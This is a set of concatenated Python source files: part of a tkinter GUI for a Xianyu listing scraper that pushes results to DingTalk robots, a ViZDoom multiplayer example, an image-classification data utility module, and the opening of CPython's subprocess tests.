User = tk.LabelFrame(self.window, text="机器人", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
User.place(x=50, y=80)
tk.Label(User, text="机器人:").grid(column=0, row=0, sticky='w', pady=5, padx=5) # 添加用户账号
self.keywordEntry = tk.Entry(User, textvariable=self.keyword, width=23)
self.keywordEntry.grid(column=1, row=0, pady=5)
tk.Button(User, text="确认添加", command=self.add_keyword).grid(columnspan=2, row=2, pady=5, ipadx=10)
def add_keyword(self):
keyword = self.keywordEntry.get().replace('https://oapi.dingtalk.com/robot/send?access_token=', '')
if keyword is '':
tk.messagebox.showerror(title='错误', message='机器人webhook不为空!')
else:
rechack_keyword = tk.messagebox.askyesno(title='检查', message='请核对{}信息无误后确认添加'.format(keyword))
if rechack_keyword:
if self.dbconf.select_one({"webhook": keyword}):
self.keyword.set('')
tk.messagebox.showerror('错误', '此机器人已经存在')
else:
self.dbconf.insert({"webhook": keyword})
self.keyword.set('')
self.userListBox.insert(END, '机器人:{};'.format(keyword)) # 关键字添加成功
# self.window.destroy()
# optionUser(self.master)
tk.messagebox.showinfo(title='恭喜', message='关键字添加成功!')
window.update()
def delete_user(self, user, pwd):
pass
# 用户数据操作
class optionUser(object):
'''
用户账号添加修改页面界面
'''
def __init__(self, master, userListBox):
self.master = master
self.userListBox = userListBox
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 4
y = (sh - wh) / 3
self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y)) # 父容器大小
self.window.title('关键字')
self.username = tk.StringVar()
self.password = tk.StringVar()
self.maxPrice = tk.StringVar()
self.dbkey = MongoKeyword()
self.create_page()
def create_page(self):
User = tk.LabelFrame(self.window, text="关键字配置", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
User.place(x=50, y=80)
tk.Label(User, text="关键字:").grid(column=0, row=0, sticky='w', pady=5, padx=5) # 添加用户账号
tk.Label(User, text="最低价格:").grid(column=0, row=1, sticky='w', pady=5, padx=5) # 添加用户密码
tk.Label(User, text="最高价格:").grid(column=0, row=2, sticky='w', pady=5, padx=5) # 添加用户密码
self.userEntry = tk.Entry(User, textvariable=self.username, width=23)
self.userEntry.grid(column=1, row=0, pady=5)
self.pwdEntry = tk.Entry(User, textvariable=self.password, width=23)
self.pwdEntry.grid(column=1, row=1, pady=5)
self.maxPEntry = tk.Entry(User, textvariable=self.maxPrice, width=23)
self.maxPEntry.grid(column=1, row=2, pady=5)
tk.Button(User, text="确认添加", command=self.add_user).grid(columnspan=2, row=3, pady=5, ipadx=10)
def add_user(self):
username = self.userEntry.get()
pwd = self.pwdEntry.get()
maxP = self.maxPEntry.get()
if username is '':
tk.messagebox.showerror(title='错误', message='关键字不为空!')
else:
rechack_useinfo = tk.messagebox.askyesno(title='检查', message='请核对{}信息无误后确认添加'.format(username))
if rechack_useinfo:
if self.dbkey.select_one({"keyword": username}):
self.username.set('')
self.password.set('')
self.maxPrice.set('')
tk.messagebox.showerror('错误', '此关键字已经存在')
else:
if pwd == '':
pwd = 0
if maxP == '':
maxP = 'None'
self.dbkey.insert({"start": 1, "keyword": username, "minPrice": pwd, "maxPrice": maxP})
self.username.set('')
self.password.set('')
self.maxPrice.set('')
self.userListBox.insert(END,
'关键字:{} 价格:{}-{} 状态:{};'.format(username, pwd, maxP, '开启')) # 同时增加用户到前端上
# self.window.destroy()
# optionUser(self.master)
tk.messagebox.showinfo(title='恭喜', message='账户添加成功!')
window.update()
def delete_user(self, user, pwd):
pass
# 使用说明界面
class Description():
'''
软件描述说明介绍界面
'''
def __init__(self, master):
self.master = master
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 650
wh = 720
x = (sw - ww) / 3
y = (sh - wh) / 3
self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y)) # 父容器大小
self.window.title('使用说明')
self.create_page()
def create_page(self):
Dev = tk.LabelFrame(self.window, text="关于使用说明", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
Dev.place(x=50, y=50)
text = "【使用前仔细阅读使用说明】 \n\n" \
"使用说明\n" \
"本项目采用异步爬取,对于闲鱼速度快,效率高。\n" \
"**注意事项**\n" \
"- 钉钉接口每个机器人每分钟只能发送20条信息。次数太多会被限制。一个群聊可以创建6个机\n器人的webhook。建议将次6条都加入到程序的机器人队列\n" \
"- 钉钉接口存在敏感字检测。当爬取的信息触发了阿里系的检测系统,信息不能发送。这里在\n日志面板给出已经提示。\n" \
"- 经过测试100多关键字的爬取效率在8-10s内完成。\n" \
"- 给出的关键字描述尽可能精确,避免大范围的搜索。如错误示例:关键字‘空调’ 范围广与\n‘空调’+品牌 或 ’空调‘+ 功能部件,缩小搜索范围。\n" \
"- 程序的爬取频率设定时间尽量多一些。否者爬取的发送信息很多,将导致钉钉接口失效。这里爬\n取频率代表一个全部爬虫结束到下一次爬虫开始的时间。建议设置为10s左右。将会\n10秒后进行下一次执行。\n" \
"- 发送方式 :1-单文本发送(若消息过多,钉钉接口限制),2-连接文本发送(手机端不支\n持跳转闲鱼app),3-markdown文本(推荐、将一次爬\n取的消息汇聚到个文本中,较少钉钉接口压力)\n" \
"- 添加关键字:关键字不为空,价格若不填则搜索时为全价。\n" \
"- 删除关键字:选中关键字任务,点击删除,确认删除。\n" \
"- 单项开启:选中关键字任务,点击开启,任务单独开启\n" \
"- 单项关闭:选中关键字任务,点击关闭,任务单独关闭\n" \
"- 一键开启:点击一键开启,默认开启全部任务\n" \
"- 一键关闭:点击一键关闭,默认关闭全部任务\n" \
"- 更新配置:实时更新爬取频率,发送方式\n" \
"- 清除缓存:清除缓存文件。软件长时间使用产生大量缓存文件,硬件运行效率下降\n" \
"- 清空配置:清除所有配置选项+缓存文件。一般不建议使用\n" \
"- 日志文件:输出日志信息\n" \
"- 系统日志:输入操作信息\n" \
"- 钉钉机器人-添加机器人:添加钉钉机器人的webhook完整链接\n" \
"- 钉钉机器人-删除机器人:选中机器人链接,点击删除,删除成功\n" \
"- 钉钉机器人-测试机器人:测试插入的webhook是否有效。将发送'欢迎测试闲鱼\n信息及时推送器-机器人验证'到钉钉群\n" \
tk.Label(Dev, text=text, justify='left').grid(column=0, row=0, sticky='w', pady=5, padx=5) # 添加用户账号
# 版本说明界面
class Version():
'''
软件版本说明介绍界面
'''
def __init__(self, master):
self.master = master
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 3
y = (sh - wh) / 3
self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y)) # 父容器大小
self.window.title('软件版本')
self.create_page()
def create_page(self):
Dev = tk.LabelFrame(self.window, text="关于版本更新", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
Dev.place(x=50, y=50)
text = " 2019年4月 26日 版本:V1.0\n "
tk.Label(Dev, text=text).grid(column=0, row=0, sticky='w', pady=5, padx=5) # 添加用户账号
# 开发者说明界面
class Developer():
'''
软件开发者介绍界面
'''
def __init__(self, master):
self.master = master
self.window = tk.Toplevel(master)
self.window.wm_attributes('-topmost', 1)
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 3
y = (sh - wh) / 3
self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y)) # 父容器大小
self.window.title('开发者')
self.create_page()
def create_page(self):
Dev = tk.LabelFrame(self.window, text="关于开发者", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
Dev.place(x=50, y=50)
text = " 作者:AJay13\n" \
" 技能:熟悉各项爬虫与反爬虫,数据清洗,\n 网站搭建,软件编写\n" \
" 联系:BoeSKh5446sa23sadKJH84ads5\n"
tk.Label(Dev, text=text, justify='left').grid(column=0, row=0, sticky='w', pady=5, padx=5) # 添加用户账号
# 版本测试时间
def test_time(over_time):
from datetime import datetime
d2 = datetime.strptime(over_time, '%Y-%m-%d %H:%M:%S')
now = datetime.now()
if d2 > now:
return True
else:
return False
if __name__ == '__main__':
if test_time('2019-4-26 16:00:00'):
window = tk.Tk() # 父容器
print('开始')
window.title("闲鱼信息及时推送器定制版ByAjay13") # 父容器标题
basePath = os.path.abspath(os.path.dirname(__file__))
print(basePath)
if not os.path.exists(os.path.join(basePath, 'temp')):
os.mkdir(os.path.join(basePath, 'temp'))
if not os.path.exists(os.path.join(basePath, 'log')):
os.mkdir(os.path.join(basePath, 'log'))
mongod = os.path.join(basePath, 'bin', 'mongod.exe')
dbpath = os.path.join(basePath, 'temp')
logpath = os.path.join(basePath, 'log', 'mongodb.log')
if not os.path.exists(logpath):
os.system(
'{} --dbpath {} --logpath {} --directoryperdb --serviceName mongodb_tb --install'.format(mongod, dbpath,
logpath))
os.system('net start mongodb_tb')
else:
os.system('net start mongodb_tb')
MainPage(window)
# 前提配置
# 配置mongodb为数据服务 初始化配置服务
'''
启动服务器服务
尝试链接数据库,搜寻配置项中db=1.链接不成功
alert 弹出数据库配置错误,尝试自动初始化,或联系管理员
1.创建本地mongodb的数据库文件夹
2.创建本地mongodb的数据库日志的文件夹
3.使用配置服务的命令
4.启动服务
5.数据库配置项中插入db为1
服务正常启动,tk面板加载配置项
异步爬虫线程启动,按照每隔10秒读取配置项内容。然后加载到进程中
关键字为:start == 1 开始加入爬取队列
'''
print('监听')
window.mainloop()
else:
window = tk.Tk() # 父容器
window.title("闲鱼信息及时推送器定制版ByAjay13") # 父容器标题
window.wm_attributes('-topmost', 1)
sw = window.winfo_screenwidth()
sh = window.winfo_screenheight()
ww = 400
wh = 300
x = (sw - ww) / 3
y = (sh - wh) / 3
window.geometry('%dx%d+%d+%d' % (ww, wh, x, y)) # 父容器大小
Dev = tk.LabelFrame(window, text="授权超时", padx=10, pady=5) # 水平,垂直方向上的边距均为 10
Dev.place(x=50, y=50)
text = " 你已经超出授权使用期限\n" \
" 请联系管理员进行提权\n \n" \
" 联系:BoeSKh5446sa23sadKJH84ads5\n"
tk.Label(Dev, text=text, justify='left').grid(column=0, row=0, sticky='w', pady=5, padx=5) # 添加用户账号
window.mainloop()
|
multiple_instances.py
|
#!/usr/bin/env python
from __future__ import print_function
from random import choice
from vizdoom import *
# For multiplayer game use process (ZDoom's multiplayer sync mechanism prevents threads to work as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Run this many episodes
episodes = 10
def player1():
game = DoomGame()
# game.load_config('../../scenarios/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 1 +sv_spawnfarthest 1")
game.add_game_args("+name Player1 +colorset 0")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Episode finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player2():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
# p1 = Thread(target = player1)
# p1.start()
if __name__ == '__main__':
p1 = Process(target=player1)
p1.start()
player2()
print("Done")
|
data_utils.py
|
"""
Miscellaneous functions manage data.
Date: September 2018
Author: Ignacio Heredia
Email: iheredia@ifca.unican.es
Github: ignacioheredia
"""
import os
import threading
from multiprocessing import Pool
import queue
import subprocess
import warnings
import base64
import numpy as np
import requests
from tqdm import tqdm
from tensorflow.keras.utils import to_categorical, Sequence
import cv2
import albumentations
from albumentations.augmentations import transforms
from albumentations.imgaug import transforms as imgaug_transforms
def load_data_splits(splits_dir, im_dir, split_name='train'):
"""
Load the data arrays from the [train/val/test].txt files.
Lines of txt files have the following format:
'relative_path_to_image' 'image_label_number'
Parameters
----------
im_dir : str
Absolute path to the image folder.
split_name : str
Name of the data split to load
Returns
-------
X : Numpy array of strs
First colunm: Contains 'absolute_path_to_file' to images.
y : Numpy array of int32
Image label number
"""
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
else: # maybe test file has not labels
y = None
return X, y
def mount_nextcloud(frompath, topath):
"""
Mount a NextCloud folder in your local machine or viceversa.
"""
command = (['rclone', 'copy', frompath, topath])
result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = result.communicate()
if error:
warnings.warn("Error while mounting NextCloud: {}".format(error))
return output, error
def load_class_names(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class names...")
class_names = np.genfromtxt(os.path.join(splits_dir, 'classes.txt'), dtype='str', delimiter='/n')
return class_names
def load_class_info(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class info...")
class_info = np.genfromtxt(os.path.join(splits_dir, 'info.txt'), dtype='str', delimiter='/n')
return class_info
def load_image(filename, filemode='local'):
"""
Function to load a local image path (or an url) into a numpy array.
Parameters
----------
filename : str
Path or url to the image
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
Returns
-------
A numpy array
"""
if filemode == 'local':
image = cv2.imread(filename, cv2.IMREAD_COLOR)
if image is None:
raise ValueError('The local path does not exist or does not correspond to an image: \n {}'.format(filename))
elif filemode == 'url':
try:
if filename.startswith('data:image'): # base64 encoded string
data = base64.b64decode(filename.split(';base64,')[1])
else: # normal url
data = requests.get(filename).content
data = np.frombuffer(data, np.uint8)
image = cv2.imdecode(data, cv2.IMREAD_COLOR)
if image is None:
raise Exception
except:
raise ValueError('Incorrect url path: \n {}'.format(filename))
else:
raise ValueError('Invalid value for filemode.')
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # change from default BGR OpenCV format to Python's RGB format
return image
def preprocess_batch(batch, mean_RGB, std_RGB, mode='tf', channels_first=False):
"""
Standardize batch to feed the net. Adapted from [1] to take replace the default imagenet mean and std.
[1] https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
Parameters
----------
batch : list of numpy arrays
mean_RGB, std_RGB : list of floats, len=3
Mean/std RGB values for your dataset.
channels_first : bool
Use batch of shape (N, C, H, W) instead of (N, H, W, C)
Returns
-------
Numpy array
"""
assert type(batch) is list, "Your batch must be a list of numpy arrays"
mean_RGB, std_RGB = np.array(mean_RGB), np.array(std_RGB)
batch = np.array(batch) - mean_RGB[None, None, None, :] # mean centering
if mode == 'caffe':
batch = batch[:, :, :, ::-1] # switch from RGB to BGR
if mode == 'tf':
batch /= 127.5 # scaling between [1, -1]
if mode == 'torch':
batch /= std_RGB
if channels_first:
batch = batch.transpose(0, 3, 1, 2) # shape(N, 3, 224, 224)
return batch.astype(np.float32)
def augment(im, params=None):
"""
Perform data augmentation on some image using the albumentations package.
Parameters
----------
im : Numpy array
params : dict or None
Contains the data augmentation parameters
Mandatory keys:
- h_flip ([0,1] float): probability of performing an horizontal left-right mirroring.
- v_flip ([0,1] float): probability of performing an vertical up-down mirroring.
- rot ([0,1] float): probability of performing a rotation to the image.
- rot_lim (int): max degrees of rotation.
- stretch ([0,1] float): probability of randomly stretching an image.
- crop ([0,1] float): randomly take an image crop.
- zoom ([0,1] float): random zoom applied to crop_size.
--> Therefore the effective crop size at each iteration will be a
random number between 1 and crop*(1-zoom). For example:
* crop=1, zoom=0: no crop of the image
* crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
* crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
* crop=0.9, zoom=0: random crop of always 90% of the image
Image size refers to the size of the shortest side.
- blur ([0,1] float): probability of randomly blurring an image.
- pixel_noise ([0,1] float): probability of randomly adding pixel noise to an image.
- pixel_sat ([0,1] float): probability of randomly using HueSaturationValue in the image.
- cutout ([0,1] float): probability of using cutout in the image.
Returns
-------
Numpy array
"""
## 1) Crop the image
effective_zoom = np.random.rand() * params['zoom']
crop = params['crop'] - effective_zoom
ly, lx, channels = im.shape
crop_size = int(crop * min([ly, lx]))
rand_x = np.random.randint(low=0, high=lx - crop_size + 1)
rand_y = np.random.randint(low=0, high=ly - crop_size + 1)
crop = transforms.Crop(x_min=rand_x,
y_min=rand_y,
x_max=rand_x + crop_size,
y_max=rand_y + crop_size)
im = crop(image=im)['image']
## 2) Now add the transformations for augmenting the image pixels
transform_list = []
# Add random stretching
if params['stretch']:
transform_list.append(
imgaug_transforms.IAAPerspective(scale=0.1, p=params['stretch'])
)
# Add random rotation
if params['rot']:
transform_list.append(
transforms.Rotate(limit=params['rot_lim'], p=params['rot'])
)
# Add horizontal flip
if params['h_flip']:
transform_list.append(
transforms.HorizontalFlip(p=params['h_flip'])
)
# Add vertical flip
if params['v_flip']:
transform_list.append(
transforms.VerticalFlip(p=params['v_flip'])
)
# Add some blur to the image
if params['blur']:
transform_list.append(
albumentations.OneOf([
transforms.MotionBlur(blur_limit=7, p=1.),
transforms.MedianBlur(blur_limit=7, p=1.),
transforms.Blur(blur_limit=7, p=1.),
], p=params['blur'])
)
# Add pixel noise
if params['pixel_noise']:
transform_list.append(
albumentations.OneOf([
transforms.CLAHE(clip_limit=2, p=1.),
imgaug_transforms.IAASharpen(p=1.),
imgaug_transforms.IAAEmboss(p=1.),
transforms.RandomBrightnessContrast(contrast_limit=0, p=1.),
transforms.RandomBrightnessContrast(brightness_limit=0, p=1.),
transforms.RGBShift(p=1.),
transforms.RandomGamma(p=1.)#,
# transforms.JpegCompression(),
# transforms.ChannelShuffle(),
# transforms.ToGray()
], p=params['pixel_noise'])
)
# Add pixel saturation
if params['pixel_sat']:
transform_list.append(
transforms.HueSaturationValue(p=params['pixel_sat'])
)
# Remove randomly remove some regions from the image
if params['cutout']:
ly, lx, channels = im.shape
scale_low, scale_high = 0.05, 0.25 # min and max size of the squares wrt the full image
scale = np.random.uniform(scale_low, scale_high)
transform_list.append(
transforms.Cutout(num_holes=8, max_h_size=int(scale*ly), max_w_size=int(scale*lx), p=params['cutout'])
)
# Compose all image transformations and augment the image
augmentation_fn = albumentations.Compose(transform_list)
im = augmentation_fn(image=im)['image']
return im
def resize_im(im, height, width):
resize_fn = transforms.Resize(height=height, width=width)
return resize_fn(image=im)['image']
def data_generator(inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Generator to feed Keras fit function
Parameters
----------
inputs : Numpy array, shape (N, H, W, C)
targets : Numpy array, shape (N)
batch_size : int
shuffle : bool
aug_params : dict
im_size : int
Final image size to feed the net's input (eg. 224 for Resnet).
Returns
-------
Generator of inputs and labels
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
# Create list of indices
idxs = np.arange(len(inputs))
if shuffle:
np.random.shuffle(idxs)
# # Reshape targets to the correct shape
# if len(targets.shape) == 1:
# print('reshaping targets')
# targets = targets.reshape(-1, 1)
for start_idx in range(0, len(inputs) - batch_size + 1, batch_size):
excerpt = idxs[start_idx:start_idx + batch_size]
batch_X = []
for i in excerpt:
im = load_image(inputs[i], filemode='local')
im = augment(im, params=aug_params)
im = resize_im(im, height=im_size, width=im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=mean_RGB, std_RGB=std_RGB, mode=preprocess_mode)
batch_y = to_categorical(targets[excerpt], num_classes=num_classes)
yield batch_X, batch_y
def buffered_generator(source_gen, buffer_size=10):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
Author: Benanne (github-kaggle/benanne/ndsb)
Parameters
----------
source_gen : generator
buffer_size: the maximal number of items to pre-generate (length of the buffer)
Returns
-------
Buffered generator
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
class data_sequence(Sequence):
"""
Instance of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Parameters are the same as in the data_generator function
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
tmp_idxs = []
for i in batch_idxs:
try:
im = load_image(self.inputs[i])
except Exception as e:
print(e)
continue
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
tmp_idxs.append(i)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[tmp_idxs], num_classes=self.num_classes)
return batch_X, batch_y
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
def standard_tencrop_batch(im, crop_prop=0.9):
"""
Returns an ordered ten crop batch of images from an original image (corners, center + mirrors).
Parameters
----------
im : numpy array, type np.uint8
crop_prop: float, [0, 1]
Size of the crop with respect to the whole image
Returns
-------
List of 10 numpy arrays
"""
batch = []
min_side = np.amin(im.shape[:2])
im = resize_im(im, height=min_side, width=min_side) # resize to shorter border
h, w = min_side, min_side # height, width (square)
crop_size = int(crop_prop * min_side)
# Crops
c1 = transforms.Crop(x_min=0,
y_min=0,
x_max=crop_size,
y_max=crop_size)(image=im)['image'] # top-left
c2 = transforms.Crop(x_min=0,
y_min=h-crop_size,
x_max=crop_size,
y_max=h)(image=im)['image'] # bottom-left
c3 = transforms.Crop(x_min=w-crop_size,
y_min=0,
x_max=w,
y_max=crop_size)(image=im)['image'] # top-right
c4 = transforms.Crop(x_min=w-crop_size,
y_min=h-crop_size,
x_max=w,
y_max=h)(image=im)['image'] # bottom-right
c5 = transforms.Crop(x_min=np.round((w-crop_size)/2).astype(int),
y_min=np.round((h-crop_size)/2).astype(int),
x_max=np.round((w+crop_size)/2).astype(int),
y_max=np.round((h+crop_size)/2).astype(int))(image=im)['image'] # center
# Save crop and its mirror
lr_aug = albumentations.HorizontalFlip(p=1)
for image in [c1, c2, c3, c4, c5]:
batch.append(image)
batch.append(lr_aug(image=image)['image'])
return batch
class k_crop_data_sequence(Sequence):
"""
Data sequence generator for test time to feed to predict_generator.
Each batch delivered is composed by multiple crops (default=10) of the same image.
"""
def __init__(self, inputs, mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
filemode='local', im_size=224):
"""
Parameters are the same as in the data_generator function except for:
Parameters
----------
crop_number : int
Number of crops of each image to take.
mode :str, {'random', 'standard'}
If 'random' data augmentation is performed randomly.
If 'standard' we take the standard 10 crops (corners +center + mirrors)
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
"""
self.inputs = inputs
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.crop_number = crop_number
self.crop_mode = crop_mode
self.filemode = filemode
self.im_size = im_size
def __len__(self):
return len(self.inputs)
def __getitem__(self, idx):
batch_X = []
im = load_image(self.inputs[idx], filemode=self.filemode)
if self.crop_mode == 'random':
for _ in range(self.crop_number):
if self.aug_params:
im_aug = augment(im, params=self.aug_params)
else:
im_aug = np.copy(im)
im_aug = resize_im(im_aug, height=self.im_size, width=self.im_size)
batch_X.append(im_aug) # shape (N, 224, 224, 3)
if self.crop_mode == 'standard':
batch_X = standard_tencrop_batch(im)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
return batch_X
def im_stats(filename):
"""
Helper for function compute_meanRGB
"""
im = load_image(filename, filemode='local')
mean = np.mean(im, axis=(0, 1))
std = np.std(im, axis=(0, 1))
return mean.tolist(), std.tolist()
def compute_meanRGB(im_list, verbose=False, workers=4):
"""
Returns the mean and std RGB values for the whole dataset.
For example in the plantnet dataset we have:
mean_RGB = np.array([ 107.59348955, 112.1047813 , 80.9982362 ])
std_RGB = np.array([ 52.78326119, 50.56163087, 50.86486131])
Parameters
----------
im_list : array of strings
Array where the first column is image_path (or image_url). Shape (N,).
verbose : bool
Show progress bar
workers: int
Numbers of parallel workers to perform the computation with.
References
----------
https://stackoverflow.com/questions/41920124/multiprocessing-use-tqdm-to-display-a-progress-bar
"""
print('Computing mean RGB pixel with {} workers...'.format(workers))
with Pool(workers) as p:
r = list(tqdm(p.imap(im_stats, im_list),
total=len(im_list),
disable=verbose))
r = np.asarray(r)
mean, std = r[:, 0], r[:, 1]
mean, std = np.mean(mean, axis=0), np.mean(std, axis=0)
print('Mean RGB pixel: {}'.format(mean.tolist()))
print('Standard deviation of RGB pixel: {}'.format(std.tolist()))
return mean.tolist(), std.tolist()
def compute_classweights(labels, max_dim=None, mode='balanced'):
"""
Compute the class weights for a set of labels to account for label imbalance.
Parameters
----------
labels : numpy array, type (ints), shape (N)
max_dim : int
Maximum number of classes. Default is the max value in labels.
mode : str, {'balanced', 'log'}
Returns
-------
Numpy array, type (float32), shape (N)
"""
if mode is None:
return None
weights = np.bincount(labels)
weights = np.sum(weights) / weights
# Fill the count if some high number labels are not present in the sample
if max_dim is not None:
diff = max_dim - len(weights)
if diff != 0:
weights = np.pad(weights, pad_width=(0, diff), mode='constant', constant_values=0)
# Transform according to different modes
if mode == 'balanced':
pass
elif mode == 'log':
# do not use --> produces numerical instabilities at inference when transferring weights trained on GPU to CPU
weights = np.log(weights) # + 1
else:
raise ValueError('{} is not a valid option for parameter "mode"'.format(mode))
return weights.astype(np.float32)
def json_friendly(d):
"""
Return a json friendly dictionary (mainly remove numpy data types)
"""
new_d = {}
for k, v in d.items():
if isinstance(v, (np.float32, np.float64)):
v = float(v)
elif isinstance(v, (np.ndarray, list)):
if isinstance(v[0], (np.float32, np.float64)):
v = np.array(v).astype(float).tolist()
else:
v = np.array(v).tolist()
new_d[k] = v
return new_d
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
